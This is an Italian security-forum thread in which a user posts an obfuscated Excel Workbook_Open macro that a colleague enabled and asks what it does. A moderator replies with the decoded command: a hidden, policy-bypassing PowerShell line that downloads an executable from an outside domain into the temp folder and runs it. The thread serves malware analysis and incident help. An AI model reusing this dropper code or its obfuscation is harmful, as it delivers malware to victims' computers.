Valutazione 4.87/ 5 (100.00%) 5838 voti

Condividi:        

macro sospetta

Come rimuovere virus e spyware? Le carte di credito sono davvero sicure in rete? È possibile navigare anonimi? Con quali programmi tutelare la propria privacy? Come proteggere i file importanti? Se volete una risposta a queste e altre domande questo è il luogo giusto!

Moderatori: Luke57, kadosh

macro sospetta

Postdi paolone2001 » 11/09/17 13:04

ciao, un mio collega ha scaricato un file excel, sul suo pc che è in rete, dopo averlo scansionato con l'antivirus, ma poi aprendolo credo abbia consentito l'uso delle macro.
ora, vi chiedo se avete idea di cosa combini questa macro, di cui riporto il listato qui sotto.
Devo essere preoccupato?
grazie, ciao
Paolo



Sub Workbook_Open()
If xlErrorBarTypeFixedValue > 0 Then
Shell "" + nubiss, O
End If
End Sub



Function nba()
nba = """"
End Function


Function zynodaf()
portog = Array("te" + "mp", "loc" + "alap" + "pda" + "ta", "ap" + "pd" + "ata", "EMAIL")
zynodaf = portog(capitalo(0, 0))
End Function


Private Function capitalo(ByVal FromLimit As Integer, ByVal ToLimit As Integer) As Integer

Randomize
randomNumber = Int((ToLimit - FromLimit) * Rnd) + FromLimit
capitalo = randomNumber

End Function


Function egoo()
egoo = "d /c" + nba
End Function


Function recviemo()
mutopp = Array(Timer(), Minute(Now), Minute(Now), "oP" + "r -e")
helliooo = Array(Timer(), "AS" + "S -W" + "i")
nagoyya = Array(Timer(), Day(Now), "DD" + "en ")
temzaas = Array(Timer(), Minute(Now), Timer(), Null, "uT" + "i B", Minute(Now), Timer(), Null)
citroen = Array(Timer(), "eLL " + "-N")
circuus = Array(Timer(), "owe" + "RS", Nothing, Timer())
dazzac = Array(Timer(), Nothing, Timer(), "RaC" + "t")
recviemo = "p" + circuus(1) + "h" + citroen(1) + "on" + "iN" + "Te" + dazzac(3) + "iv" + "E -N" + mutopp(3) + "xeC" + temzaas(4) + "yP" + helliooo(1) + "nD" + "O " + " hI" + nagoyya(2)
End Function

Function nubiss()
flattop = zynodaf
nubiss = "c" + "M" + egoo + recviemo + nba + "(.(\""{2}{0}{1}\"" -f'-o','bj" + "ect','new') (\""{1}{3}{5}{0}{2}{4}\"" -f't','syst','.webclie','em','nt','.ne')).('d'+'ow'+'nloadfil'+'e').Invoke('http://34tfg4th.date/fmouse.exe','%" + flattop + "%.exe');&(\""{0}{2}{1}\""-f'star','ss','t-proce') '%" + flattop + "%.exe'" + nba + nba
End Function
paolone2001
Utente Junior
 
Post: 19
Iscritto il: 05/01/08 17:54

Sponsor
 

Re: macro sospetta

Postdi Anthony47 » 12/09/17 00:05

Per chi volesse dare una mano, la macro dovrebbe aver eseguito, tramite Shell, questo comando:
Codice: Seleziona tutto
cMd /c"poweRSheLL -NoniNTeRaCtivE -NoPr -exeCuTi ByPASS -WinDO  hIDDen "(.(\"{2}{0}{1}\" -f'-o','bject','new') (\"{1}{3}{5}{0}{2}{4}\" -f't','syst','.webclie','em','nt','.ne')).('d'+'ow'+'nloadfil'+'e').Invoke('http://34tfg4th.date/fmouse.exe','%temp%.exe');&(\"{0}{2}{1}\"-f'star','ss','t-proce') '%temp%.exe'""

Ciao
Anthony
Win7 + Office 2010 Ita; Win 7 + Office 2013 Ita
Xp + Office 2003 Ita
E voi cosa usate? (per istruzioni vedere viewtopic.php?f=26&t=97449)
Avatar utente
Anthony47
Moderatore
 
Post: 14993
Iscritto il: 21/03/06 16:03
Località: Ivrea


Torna a Sicurezza e Privacy


Topic correlati a "macro sospetta":


Chi c’è in linea

Visitano il forum: Nessuno e 10 ospiti